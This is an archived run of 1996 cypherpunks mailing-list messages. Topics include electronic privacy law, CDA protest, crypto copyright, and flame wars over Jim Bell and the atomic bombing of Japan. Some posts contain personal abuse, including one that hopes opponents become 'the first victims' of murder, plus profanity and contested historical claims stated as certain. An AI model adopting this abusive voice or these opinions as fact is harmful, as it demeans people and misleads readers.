j2R/pWwdCwE=
=WXd4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 5 Feb 1996 07:58:19 +0800
To: tallpaul@pipeline.com
Subject: Re: Sometines ya just gotta nuke em-and nuke em again
Message-ID: <01I0TPKBDGZQA0UULQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Since the only cryptographic relevance here is whether the US knew
about Japan's current state, and that isn't actually relevant, I won't
respond to the list further on this. I regard the dropping of the bomb as
right because it saved American lives, no matter who you believe on how many.
America was on the side of good in WWII, and the Japanese (as much as they
fail to admit it publically, including to their schoolchildren) were on the
evil one. This is the case for several reasons:
	First, the Japanese had allied themselves with the Nazis.
	Second, the Japanese had done definite wrongs in China and elsewhere.
	Third, the Japanese attacked the US first (and it doesn't matter
whether the US knew about it beforehand).

	It also doesn't matter whether Truman et al were considering the
effects on the Soviet Union. To use a current example, just because an ISP
is paid doesn't mean that that ISP is wrong to keep on Neo-Nazi material. 
	If you wish to continue this discussion; feel free to do so via private
email.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 5 Feb 1996 10:28:48 +0800
To: cypherpunks@toad.com
Subject: Computer Law Observer
Message-ID: <01I0TPOQUFDOA0UULQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 29 Jan 1996 18:01:16 -0500
From: Galkin@aol.com
Subject: The Computer Law Observer #16

=====================================
GENERAL INFO: The Computer Law Observer is distributed (usually) weekly
for free and is prepared by William S. Galkin, Esq. The Observer is
designed specifically for the non-lawyer. To subscribe, send e-mail to
wgalkin@earthlink.com. All information contained in The Computer Law
Observer is for the benefit of the recipients, and should not be relied
on or considered as legal advice. Copyright 1996 by William S. Galkin.
=====================================

ABOUT THE AUTHOR: Mr. Galkin is an attorney in private practice in
Owings Mills, Maryland (which is a suburb of Baltimore). He is an
adjunct professor of Computer Law at the University of Maryland School
of Law and has concentrated his private practice in the Computer Law
area since 1986. He represents small startup, midsized and large
companies, across the U.S. and internationally, dealing with a wide
range of legal issues associated with computers and technology, such as
developing, marketing and protecting software, purchasing and selling
complex computer systems, and launching and operating a variety of
online business ventures. He also enjoys writing about computer law
issues!

===> Mr. Galkin is available for consultation with individuals and
companies, wherever located, and can be reached as follows: E-MAIL:
wgalkin@earthlink.com/TELEPHONE: 410-356-8853/FAX: 410-356-8804/MAIL:
10451 Mill Run Circle, Suite 400, Owings Mills, Maryland 21117.
Articles in The Observer are available to be published as columns in
both print and electronic publications. Please contact Mr. Galkin for
the terms of such usage.

*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+
ELECTRONIC PRIVACY RIGHTS AND POLICE POWER
*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+

[This is the third of a series of articles discussing privacy rights in
the digital age.]

It's no secret. Law enforcement agents are closely monitoring traffic
on the Internet. It is also no secret that crime is proliferating on
the Internet at a frightening pace. Law enforcement agents are a bit
unnerved as they watch their tried and true methods of law enforcement
become antiquated. However, law enforcement on the Internet is starting
to come of age.

Here are some recent examples:

(1) The Secret Service set up a bogus bulletin board system for the
purpose of attracting people who want to sell stolen cellular phone
codes. Thieves often get these codes by using scanners which pick up
the code-embedded signals emitted from moving cars. The result: six
arrests and seizure of 20 computer systems.

(2) The Justice Department ended a two-year investigation into use of
America Online (AOL) for the distribution of child pornography and
perpetration of other sex-crimes. The result: 125 homes were searched,
computer systems seized and numerous arrests made across the country.

(3) Just this month, the Secret Service noticed that Virtual Visions
(http://www.vv.com/~gilmore/head/heads.html) put up a new web page
which shows the heads of public figures such as Bob Dole, Boris Yeltsin
and Bill Gates, slowly exploding. Virtual Visions intended this to be
political satire. The result: the developer of the web page received a
visit from the Secret Service.

The Fourth Amendment -

The objectives of law enforcement and of personal privacy are on a
collision course on the Information Highway. Law enforcement personnel
desire access to as much information as possible to conduct their
investigations. Individuals want to restrict access to personal
information.  It is necessary to achieve a balance between effective
law enforcement and personal privacy. How the Fourth Amendment to the
U.S. Constitution is interpreted will play a crucial role in
determining where this balance is reached.

The 4th Amendment prohibits government agents from conducting
unreasonable searches and seizures. The Supreme Court has defined a
seizure of property as a "meaningful interference with an individual's
possessory interest in that property." The concept of seizure of
information differs dramatically from seizure of tangible property.
Seizure of tangible property means that the owner has been deprived of
the use and possession of the property. Whereas, when information is
"seized" the owner may still have possession of the information.  It is
just that the information has been copied and is now also in the hands
of someone else.

It could be argued that under the Fourth Amendment no seizure occurs
when digital information is merely copied. However, applying the
analysis used to prohibit wiretapping (which has been defined as a
seizure), seizure of information would also fall within the
constitutional definition of seizure.  In the information context,
"seizure" should be interpreted as meaning being deprived of the
ability to control the disclosure and dissemination of the information.
This ability to control is the value of the possessory interest of
information.

The application of the term "search" in the digital environment is more
complicated. An unlawful search requires as a prerequisite that (1)
subjectively, the person in possession of the item searched had an
actual expectation of privacy and (2) objectively, the person had an
expectation of privacy. The subjective expectation of privacy element
has been criticized, because in theory, it would be very easy for the
government to eliminate any expectation of privacy by announcing that
it will perform broad searches.  However, in practice, the Supreme
Court has focused on the objective requirement.

On one end of the spectrum is data resident in a stand-alone computer.
Here, there is certainly an objective expectation of privacy. On the
other end of the spectrum lie the vast open areas of the Internet, such
as web pages and newsgroups to which there can be no objective
expectation of privacy.

Accordingly, law enforcement agents are free to roam through these open
areas, assemble records on who is participating in which groups, and
what they are saying. For example, if the Secret Service wanted to
assemble all the messages that you posted in newsgroups in the last
year (the technology to perform this search available) in order to
determine your political positions, this would not violate the Fourth
Amendment.

The middle ground is where the legal battles will be fought. This will
primarily involve information that is in the possession of a third
party, and is not readily accessible to the public.

Under traditional constitutional analysis, where information is
disclosed to a third party, the expectation of privacy is abandoned.
For example, most state laws, and the federal Constitution, permit
wiretapping if one party to the conversation consents. However, the
scope of the abandonment will usually only apply to the amount of
information needed by the recipient.

For example, the telephone numbers you dial are disclosed to the phone
company in order that the phone company can perform its service.
Thereby, a person abandons the expectation regarding the number
dialed.  However, even though the content of telephone conversations is
also given over to the phone company, this content is not needed for
the phone company to perform its service. Therefore, the content of
phone conversations retains the expectation of privacy.

By analogy, this would also apply to e-mail messages maintained on a
service provider's equipment. Information such as the senders' and
recipients' addresses, the file sizes and times of transmissions are
not private. But the content of the messages would be.

In the workplace, an employer is not permitted to consent to a search
of personal areas of an employee. For example, a desk draw that
contains personal correspondence. By accepted convention, this is a
private area.

Private network directories which require a password to enter would
probably also retain an expectation of privacy. However, in each case,
a court will look at specific corporate policies to determine whether
there is an objective expectation of privacy or whether the employee
was informed that the employer may at any time without notice enter
these pass-worded directories.

Along these lines, since a court wants to determine the objective
expectation of privacy, an agreement that an employer will not consent
to a search would have no effect. What would be needed is an agreement
that the employer will not access these private areas, which deprives
the employer of the right to consent.

When determining the objective expectation privacy, courts will have to
balance the value of the particular privacy interest claimed against
the level of the law enforcement interest.  Only this month, America
Online under subpoena turned over personal e-mail records relating to a
criminal investigation where the murderer allegedly met the victim in
an AOL chat room. AOL has been criticized for not challenging the
subpoena. AOL's position is that if it receives a search warrant, it
will comply. This case highlights the valid competing interests of both
law enforcement and personal privacy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 5 Feb 1996 21:13:01 +0800
To: cypherpunks@toad.com
Subject: Turn yourself in!
Message-ID: <199602050252.SAA24214@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The alt.tasteless crowd is currently discussing the CDA, with
some predictable results, and some not so predictable...
If you wish to participate in mass civil disobedience, follow
these instructions: Send a message CC'd to your local media's net
address and to justice.usdoj.gov (Department of Justice) which
contains something to the effect of, "I wish to turn myself in
for the crime of distributing offensive material via the Internet
and as evidence, provide the following:"
Attach some sort of uuencoded data to your message as "evidence".
Make sure that every possible media outlet hears loud and clear
that you want every last case prosecuted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdoe-0007@alpha.c2.org
Date: Mon, 5 Feb 1996 14:01:33 +0800
To: cypherpunks@toad.com
Subject: Jim Bell - Murderous Terrorist
Message-ID: <199602050306.TAA01578@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Vulis writes:

AO> Alan Olsen <alano@teleport.com> writes:

AO> I consider Mr. Bell to be a crank and a loon.

DV> You're certainly entitled to your opinion. You might be interested to know that
DV> I consider Jim Bell to be highly intelligent, knowledgeable, and overall nice
DV> person. I'm particularly impressed by his calm and restrained response to your
DV> provocations. I've also formed a rather negative opinion of you, based on your
DV> actions in this incident.

Jim Bell has advocated nothing less than paid death squads using crypto as a
means to hide payment to these murderous terrorists.  If you can find a conspirator
of murder as " highly intelligent, knowledgeable, and overall nice person" then
you also are in need of immediate mental health intervention.

Should the mainstream media ever get wind of Bell's lunacy it will be one more
nail in the crypto-coffin spurring the Feds and international anti-crypto efforts to
a frenzy.  Bell is either a total fucking lunatic of the extreme right wing (having
read his suck ups posts supporting General Linda Thompson) or an agent 
provocateur for the Feds.  One is as bad as the other.  To quote your own
words to Mr. Olsen; " I've also formed a rather negative opinion of you, based
on your actions in this incident."

AO> He has no interest in any sort of honest discussion.

DV>  Honest or dishonest, the discussion of Jim's political views has nothing 
DV> to do with encryption.

His plans for death squads success DEPENDS on the anonymity provided by
CRYPTO!

AO> He wishes to draw in others in the hope of "punishing me".

DV> You're punishing yourself by destroying your credibility and carrying on this
DV> silly flame war. You've kicked Jim off of "your" mailing list, pushing the
DV> flame war that you've started to this list. I don't appreciate this.

And you think YOU have credibility here?  Sounds like you are cut from
the same murderous cloth as Jim Bell.

I pray that if by some freak of anarchy Bell's plan ever comes to
fruition both you and Bell will be the first victims of your own murderous
madness.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 5 Feb 1996 10:05:08 +0800
To: jpp@software.net
Subject: RE: Don't type your yes/fraud response into your computer
Message-ID: <960204190820.2020e029@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>Nice try - but the virtual machine model used by intel supports interception
>of I/O operations. 

(something educating prior generations how to apply a near vacuum to shelled
embryos).

Sure it does - why it is essential for protective activity to begin while
the system is still in REAL mode following boot. Might also need to write
a .VXD (horrors)

>I still think the basic 'if the machine is not secure all bets are off'
>premis stands.

Oh I agree, just believe that software can make a machine secure (or at
least detect when security cannot be assured which is almost as good). 

Might I suggest you take a look at the "safe PC" discussions on Virus-L c.a
1989-1990. We were talking about virus protection then but is the same
thing. Believe it or not, we even had real and protected mode discussions
back in those days while we were waiting for Noah (only guy who ever took
out a cattle boat and wound up half-way up a mountain...).

					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 5 Feb 1996 09:49:03 +0800
To: alano@teleport.com
Subject: Re: [FLAME] Concerning Jim Bell
In-Reply-To: <2.2.32.19960204211446.00948c20@mail.teleport.com>
Message-ID: <a0TsiD55w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


THE FOLLOWING IS A FLAME.

Alan Olsen <alano@teleport.com> writes:
> It has been brought to my attention that I did not make this as
> clear as it should be.

Alan, you've indicated previously that you won't post anything more on this
subject to cypherpunks@toad.com.

>         I consider Mr. Bell to be a crank and a loon.

You're certainly entitled to your opinion. You might be interested to know that
I consider Jim Bell to be highly intelligent, knowledgeable, and overall nice
person. I'm particularly impressed by his calm and restrained response to your
provocations. I've also formed a rather negative opinion of you, based on your
actions in this incident.

>         He has no interest in any sort of honest discussion.

I can say with confidence that no one on this cp list has any interest in
the flame war that you're trying to drag in here, nor in a discussion of Jim's
views that are not crypto-related. You apparently tried and failed to start a
discussion of Jim's non-crypto-related views in this forum, which no one really
gives a rat's ass about. Honest or dishonest, the discussion of Jim's political
views has nothing to do with encryption.

>         He wishes to draw in others in the hope of "punishing
> me".

You're punishing yourself by destroying your credibility and carrying on this
silly flame war. You've kicked Jim off of "your" mailing list, pushing the
flame war that you've started to this list. I don't appreciate this.

> - From now on, I am ignoring all of his posts and "killfiling"
> him.

Jim is already ignoring you. So should everyone else. Please stick to your
promise. So far, you've posted several times more on this subject than Jim.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 5 Feb 1996 09:43:42 +0800
To: cypherpunks@toad.com
Subject: Re: Wading through lame crap, plus on-topic privacy stuff
In-Reply-To: <ML-2.0.823473101.7349.don@wero.cs.byu.edu>
Message-ID: <68usiD56w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Don <don@cs.byu.edu> writes:
> Now for the on-topic stuff. Looking through my mail yesterday, noticed a
> credit card application from BofA. Despite the fact that they didn't want
> to give me a card three years ago, they have offered a student card to me.
> I figured that it was a lucky guess, them knowing I'm a student again. Then
> I noticed they were kind enough to fill in my school ("Main Campus" too) into
> the appropriate blank. Now, that's either a really good guess, or else they'v
> been out looking me up. I'm currently writing a letter to BofA telling them
> they can kiss my rear if they're going to go around keeping tabs on me. They
> should at least be more careful about letting me on to them.

Most likely, BofA just obtained the mailing list of all students from your
school and mailed the same offer to all. If you read the fine print, you'll
probably find that your application is still subject to their credit approval.

> This got me interested in which companies keep track of what information. I'm
> now going to write to my other credit companies and ask something like:
...

If you haven't read the book _Privacy for Sale: How Computerization Has Made
Everyone's Private Life an Open Secret_ by Jeffrey Rothfeder
(ISBN 0-671-73492-x), I suggest you get hold of it. You'll be amazed. :-)

>    spending habits, ie, types of goods, dollar amounts and locations,
>      for any purpose

Most definitely! When you charge things to your credit cards, the types of
products and services you purchase, and the typical amounts you spend
all go into your consumer profile, available for the right price.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 6 Feb 1996 00:11:42 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Is this email getting through?
In-Reply-To: <v02120d02ad3b004ede56@[192.0.2.1]>
Message-ID: <2mVsiD57w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


shamrock@netcom.com (Lucky Green) writes:
> I have not received any CP traffic for several days. Repeated
> (re-)subscription requests didn't generate a reply from majordomo. If this
> message shows up on the list, please let me know.

You've probably received no CP traffic because none was posted to the
mailing list. Have you getting much noise, sound, fury, and the flaming of
innocent anonymous remailers? :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Feb 1996 00:13:25 +0800
To: cypherpunks@toad.com
Subject: Songs, Janis, Left to Lose, and Salinas
Message-ID: <ad3aab8c120210042b14@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:57 AM 2/5/96, "A. Padgett Peterson, P.E. Information Security"
<PADGETT@hobbe wrote:
>OK, I give up. Took off the head phones  connected to the TO, went downstairs,
>set the V-15 Type II on the Dual 1019 to 7/8 gm. Patched to the Pioneer 1500TD
>amp feeding front AR-5's and rear AR-2ax's, cranked to "pain" and spun some
>vinyl.

You might want to explain to the GenXers what "vinyl" is.


>"Freedom's just anotha' word foa nothin' left to lose." - Janis Joplin &
>Full Tilt Boogie Band, Columbia PC 32168 (first one I found in the pile -
>believe the original was on a album with her standing spraddlelegged with
>the big grin - is here *somewhere*. Credit on th record was K. Kristofferson
>and F. Foster. (Had to go downstairs, contrary to popular belief, everything
>is not in my den 8*).

Speaking of this song, I live "near Salinas."

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 6 Feb 1996 00:11:19 +0800
To: dmandl@panix.com
Subject: RE: [NOISE] Futplex makes the news!
Message-ID: <960204195726.2020e029@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


OK, I give up. Took off the head phones  connected to the TO, went downstairs,
set the V-15 Type II on the Dual 1019 to 7/8 gm. Patched to the Pioneer 1500TD
amp feeding front AR-5's and rear AR-2ax's, cranked to "pain" and spun some
vinyl.

"Freedom's just anotha' word foa nothin' left to lose." - Janis Joplin &
Full Tilt Boogie Band, Columbia PC 32168 (first one I found in the pile -
believe the original was on a album with her standing spraddlelegged with
the big grin - is here *somewhere*. Credit on th record was K. Kristofferson
and F. Foster. (Had to go downstairs, contrary to popular belief, everything
is not in my den 8*).
						warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 5 Feb 1996 12:20:51 +0800
To: "James M. Cobb" <llurch@networking.stanford.edu
Subject: Re: Sometimes ya just gotta nuke em
Message-ID: <199602050359.TAA03592@news1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:36 AM 2/4/96 -0500, James M. Cobb wrote:
>  Neither dropping nuclear weapons on Japanese cities nor an invasion 
>  of Japan was necessary to secure surrender of the Japanese government. 

After the first nuclear bomb was dropped, the Japanese government
held a cabinet meeting in which they summoned Nishina, head of the
atomic program, and asked him if he could duplicate atomic weapons
within a few months.

After two nuclear weapons had been dropped on Japan, the cabinet concluded
that Japan faced utter destruction with nuclear weapons, and some advocated
surrender.  But according to emperor Hirohito

   "At the time of the surrender, there was no prospect of agreement"

Even with two nuclear weapons, surrender was far from assured.  It was touch
and go:  Had the coup succeeded, Japan would not have surrendered, and 
a considerably more nuclear bombing would have been necessary.  The bullet
holes in the imperial palace testify that even after two nuclear bombs,
there was a substantial faction of the government determined not to surrender.

It was certainly true that Japan was defeated, and reasonable people may
disagree on justice of using nuclear weapons under these circumstances, but
to claim, as Alperovitz claims, that Japan was on the verge of surrender, 
is not a mere difference of opinion on the interpretation of the facts, but
a simple, crude, barefaced, blatant lie.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 5 Feb 1996 11:30:54 +0800
To: cypherpunks@toad.com
Subject: Arthur C. Clarke Supports Strong Crypto
Message-ID: <ad3aad571302100496ed@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(Pardon me for mentioning crypto...)

Arthur C. Clarke, known to most of you (author of many SF works, coiner of
the phrase: "all sufficiently advanced technlogies are indistinguishable
from magic," mention by Alan Olsen yesterday), has a role in a "Discovery
Channel" program called "Mysterious Universe."

The episode tonight dealt with famous ciphers, including the Beale Cipher
(buried gold), the Voynich Manuscript (who knows what it is), and the
Vinland Map (my ancestors beat the Italians to the New World).

Clarke concluded by opining that strong ciphers that can only be read by
the intended recipient are now more important than ever.

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 5 Feb 1996 11:38:55 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: [NOISE] Sound bites re the Zundel German censorship thing (fwd)
Message-ID: <ad3aafab1402100422f5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:05 AM 2/5/96, Rich Graves wrote:

>Sorry if you get duplicate copies, but I agree with Tim that mailing list
>cross-pollution is bad.
>
>*Not* for broader redistribution, because they deserve privacy, but
>illustrative for, say, certain knee-jerk anti-PC forces here, is the fact
>that the two people who run webcom.com (Bcc'd) have been reported to be:
>
>1. Grandson of a Holocaust victim
>2. Activist with PEN and Amnesty International
>
>I think we're all on the right side here, and for all the right reasons.
...

Thanks, Rich!

I really think the Wiesenthal Center and whatnot could really make some
good points, and gain new friends, by PUTTING THE HOLOCAUST DENIAL CRAP ON
THEIR SERVERS!

Yes, an extreme step. But think of what it would say?

--Tim


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@cs.byu.edu>
Date: Mon, 5 Feb 1996 21:12:27 +0800
To: cypherpunks@toad.com
Subject: Nyms with keys
Message-ID: <ML-2.0.823490857.8565.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am compiling a list of PGP keys from well known nyms. I only remember a few,
I was wondering if anyone could think of any others:

Pr0duct Cypher
CancelMoose
Cypherpunk Enquirer needs one, if nothing more than for kicks
Scamizat
any signatures on RC2, RC4 for HP, etc.

I'd swear there's a couple more but I can't think of them.

Also wondering if anyone besides Bill Stewart has been done anything with
nym-key-signing, especially on a first-come first-serve, no verification
basis.

thanks

Don


Discovered today that secretly replacing your computer with a can of Folgers
crystals(TM) undermines all online security. I will be applying for a patent
soon which uses a Mr Coffee(TM) machine to detect this invasion.

PS: ObNukes: None.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Tue, 6 Feb 1996 08:06:01 +0800
To: Brian Davis <alano@teleport.com>
Subject: Re: Encryption and Backups
Message-ID: <2.2.32.19960205043354.00703aa4@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 4 Feb 1996, Alan Olsen wrote:

> Something that I have not seen addressed is the need for strong encryption
> in backup software.
>
> Most backup software has an "encryption" option, but I have seen few that
> have anything resembling strong encryption.  Furthermore, I have seen no
> real push for strong encryption for backups at all.
> ... 
> Might be an idea for a product there...  (And you can bet law enforcement
> would throw a hissy fit about its existence.)
>
CP Backup (part of PC Tools for Central Point aka Symantec) has DES. As to
how good the implementation is: I have no idea.

--
John Pettitt
email:         jpettitt@well.sf.ca.us (home)
               jpp@software.net       (work)    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 5 Feb 1996 10:03:24 +0800
To: cypherpunks@toad.com
Subject: Protecting the innocent on the nets
Message-ID: <960204203505.2020e029@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


About a year ago I came up with a mechanism to allow subscription or
controlled circulation magazines to be distributed on the net. Not
saying is new, just was new to me. Seems like it would be a mechanism
for anyone to communicate/access Web pages without crypto, yet allowing
protection of such things from those requiring such protection.

Concept works like this: LZ (or most other) compressed files have two 
elements - a data dictionary and ordered pointers to that dictionary.

Now say you took a large number of text files/.Gifs/.Jpegs/whatever and
created a universal (well nearly) data dictionary that would fit on a 
CD-Rom. Using large patterns and good ordering techniques could achieve
good throughput.

Now to a group of subscribers/friends/whatever, the disk is distributed
in a controlled manner.

Once distribution is made, then what is sent on the net/put on the Web
page are just the pointers to the data dictionary plus any patterns not
in the dictionary (low enough not to create anything intelligable).

What you have is a gigantic book code with a copyrightable book for which
you can control the circulation. Those under age need not apply. If they
obtain one, then it was illegally and you have made a "good faith attempt"
IMNSLO to protect the innocent.

Can even change the CD-Rom dictionary *order* yearly/montly/whatever if
you want.

Comment ?
					Warmly,
						Padgett

ps if you reply to the list, *please* do not copy me, my volume is silly
   enough without getting duplicates as it is.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 5 Feb 1996 15:22:45 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Sound bites re the Zundel German censorship thing (fwd)
In-Reply-To: <ad3aafab1402100422f5@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960204204921.2292V-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996, Timothy C. May wrote:

> I really think the Wiesenthal Center and whatnot could really make some
> good points, and gain new friends, by PUTTING THE HOLOCAUST DENIAL CRAP ON
> THEIR SERVERS!
> 
> Yes, an extreme step. But think of what it would say?

They already have one of the best compilations of racist links on the 
Web, which according to posts on Stormfront-L is often used by the Aryan 
Overloard types (snicker) to keep tabs on each other.

There are some copyright and ease-of-updating issues associated with 
mirroring the opposition's files. PGP authentication of Web pages would 
help. I've offered to show Zundel how to do it, but for some strange 
reason, he hasn't been answering my mail as promptly as he used to.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 5 Feb 1996 13:31:24 +0800
To: cypherpunks@toad.com
Subject: Re: Turn yourself in!
In-Reply-To: <199602050252.SAA24214@jobe.shell.portal.com>
Message-ID: <Pine.ULT.3.91.960204205838.2292W-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Very cute, but I hope this doesn't degenerate into serious mail-bombing 
(which I'm sure it will, unfortunately).

The simple text "Fuck the CDA up the ass!" should do. Sorry I'm not very 
creative with such things.

-rich

On Sun, 4 Feb 1996 anonymous-remailer@shell.portal.com wrote:

> The alt.tasteless crowd is currently discussing the CDA, with
> some predictable results, and some not so predictable...
> If you wish to participate in mass civil disobedience, follow
> these instructions: Send a message CC'd to your local media's net
> address and to justice.usdoj.gov (Department of Justice) which
> contains something to the effect of, "I wish to turn myself in
> for the crime of distributing offensive material via the Internet
> and as evidence, provide the following:"
> Attach some sort of uuencoded data to your message as "evidence".
> Make sure that every possible media outlet hears loud and clear
> that you want every last case prosecuted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 5 Feb 1996 15:24:54 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: RC2 protected by copyright?
Message-ID: <199602050503.VAA18831@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Lewis (nee' Futplex) McCarthy writes:

> I think many cryptographers would agree that the S boxes in DES represent
> some pretty weighty ideas indeed, and constitute an intrinsic part of the
> algorithm. Offhand the precise construction of the RC2 permutation table
> doesn't seem to me to be nearly as important to the strength of RC2 as the
> S boxes are to DES' strength. I'm certainly no expert. But I'm a little 
> hesitant to dismiss the specified table as "a bit of text". 

> Do you think the table would be more like an idea if it turned out to be
> determined by pi ?  (not a rhetorical question)

Yes, the table would have been more an idea, and less "just text" if it
was derived from pi (as the comment in the posted code suggests...)

What I was suggesting is a way to get the tremendous protection of
copyright (that is, 75 year term, no filing fees, protected from birth, no
secrecy required) on ciphers. 

Now, this was tried with video games, each Nintendo cartridge had in
it something like "copyright Nintendo", as a way to try to get that
protection, and I believe that they lost in court (if my memory is
correct)

Everyone knows the story of the compositions of the S-Boxes in DES, that
they just happen to contain constants that make it difficult to attack
DES with differential cryptanalysis.  There are almost an infinite number
of S-Boxes that would have that property (probably more that wouldn't).
But if you were going to write a code that would interoperate
with somebody else's DES, there is absolutely no way to do describe it
except to enumerate the S-Boxes, hence perhaps violating the copyright.
You can say "make it resistant to linear and differential cryptanalysis",
and you may get something as good, or better, but it wouldn't interoperate.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
